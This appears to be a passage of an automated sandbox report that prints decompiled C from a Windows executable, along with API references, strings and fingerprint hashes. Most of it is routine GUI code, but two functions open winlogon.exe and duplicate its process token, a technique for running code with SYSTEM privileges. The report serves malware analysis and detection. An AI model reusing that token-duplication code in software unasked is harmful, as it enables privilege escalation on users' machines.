Download Yara Rule

C-Code - Quality: 100%

			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}

0x004028a3
0x004028ab
0x004028bd
0x004028ca
0x004028d7
0x004028e3
0x004028e6
0x004028e8
0x00000000
0x004028eb
0x004028ec

APIs

LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6

Strings

DuplicateTokenEx, xrefs: 004028DB
advapi32.dll, xrefs: 004028A6
CreateProcessWithLogonW, xrefs: 004028B7
CreateProcessWithTokenW, xrefs: 004028C2
OpenProcessToken, xrefs: 004028CF

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
API String ID: 2238633743-1970996977
Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14

Uniqueness

Uniqueness Score: -1.00%

Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}

APIs

memset.MSVCRT ref: 004045F6
memset.MSVCRT ref: 0040460B
_snwprintf.MSVCRT ref: 0040462A
_snwprintf.MSVCRT ref: 0040463E
RegDeleteKeyW.ADVAPI32(?,?), ref: 00404656
RegDeleteKeyW.ADVAPI32(?,?), ref: 00404662
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0002001F,?,?,00403904), ref: 0040466E

Strings

%s\shell\%s\command, xrefs: 00404618
%s\shell\%s, xrefs: 00404631

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Delete_snwprintfmemset$Close
String ID: %s\shell\%s$%s\shell\%s\command
API String ID: 1018939227-3575174989
Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED

Uniqueness

Uniqueness Score: -1.00%

Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}

APIs

LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
#17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD

Strings

InitCommonControlsEx, xrefs: 00403168
Error: Cannot load the common control classes., xrefs: 004031A7
Error, xrefs: 004031A2
comctl32.dll, xrefs: 00403145

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C

Uniqueness

Uniqueness Score: -1.00%

Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}

APIs

GetSystemMetrics.USER32 ref: 00404DC2
GetSystemMetrics.USER32 ref: 00404DC8
GetDC.USER32(00000000), ref: 00404DD5
GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
ReleaseDC.USER32 ref: 00404DF4
GetWindowRect.USER32 ref: 00404E07
GetParent.USER32(?), ref: 00404E12
GetWindowRect.USER32 ref: 00404E2F
MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
String ID:
API String ID: 2163313125-0
Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}

0x0040639c
0x004063a4
0x004063b2
0x004063c2
0x004063d3
0x004063dc
0x004063eb
0x004063f0
0x00406401
0x00000000
0x0040641e
0x0040641f

APIs

Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE

wcscpy.MSVCRT ref: 004063B2
wcscpy.MSVCRT ref: 004063C2
GetPrivateProfileIntW.KERNEL32 ref: 004063D3

Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30

Strings

general, xrefs: 004063B7
TranslatorURL, xrefs: 0040640B
TranslatorName, xrefs: 004063F7
rtl, xrefs: 004063CD
charset, xrefs: 004063E1

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfilewcscpy$AttributesFileString
String ID: TranslatorName$TranslatorURL$charset$general$rtl
API String ID: 3176057301-2039793938
Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}

APIs

memcpy.MSVCRT ref: 0040AE28
memcpy.MSVCRT ref: 0040AE54
memcpy.MSVCRT ref: 0040AE6E

Strings

&, xrefs: 0040AE4E
<, xrefs: 0040AE05
°, xrefs: 0040AE3F
", xrefs: 0040AE22
>, xrefs: 0040AE13
<br>, xrefs: 0040AE68

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF

Uniqueness

Uniqueness Score: -1.00%

Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}

APIs

memset.MSVCRT ref: 0040421E
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
DragFinish.SHELL32(?), ref: 0040423F

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4

BeginDeferWindowPos.USER32 ref: 0040427D
EndDeferWindowPos.USER32(?), ref: 004043A4
InvalidateRect.USER32(?,?,00000001), ref: 004043AF

Strings

$, xrefs: 004043CA

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
String ID: $
API String ID: 2142561256-3993045852
Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4

Uniqueness

Uniqueness Score: -1.00%

Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
wcscpy.MSVCRT ref: 00405C02

Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE

wcslen.MSVCRT ref: 00405C20
GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73

Strings

strings, xrefs: 00405BF8

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
String ID: strings
API String ID: 3166385802-3030018805
Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C

Uniqueness

Uniqueness Score: -1.00%

Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}

APIs

OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3

Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB

Strings

winlogon.exe, xrefs: 00401E4B

Memory Dump Source

Source File: 0000000E.00000002.330305170.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.330294048.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.330340002.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.330350884.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
String ID: winlogon.exe
API String ID: 1315556178-961692650
Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94

Uniqueness

Uniqueness Score: -1.00%

Function 00405236, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00405236(short* __ebx, intOrPtr _a4) {
				int _v8;
				char _v12;
				void _v2058;
				void _v2060;
				int _t35;
				int _t41;
				signed int _t48;
				signed int _t49;
				signed short* _t50;
				void** _t52;
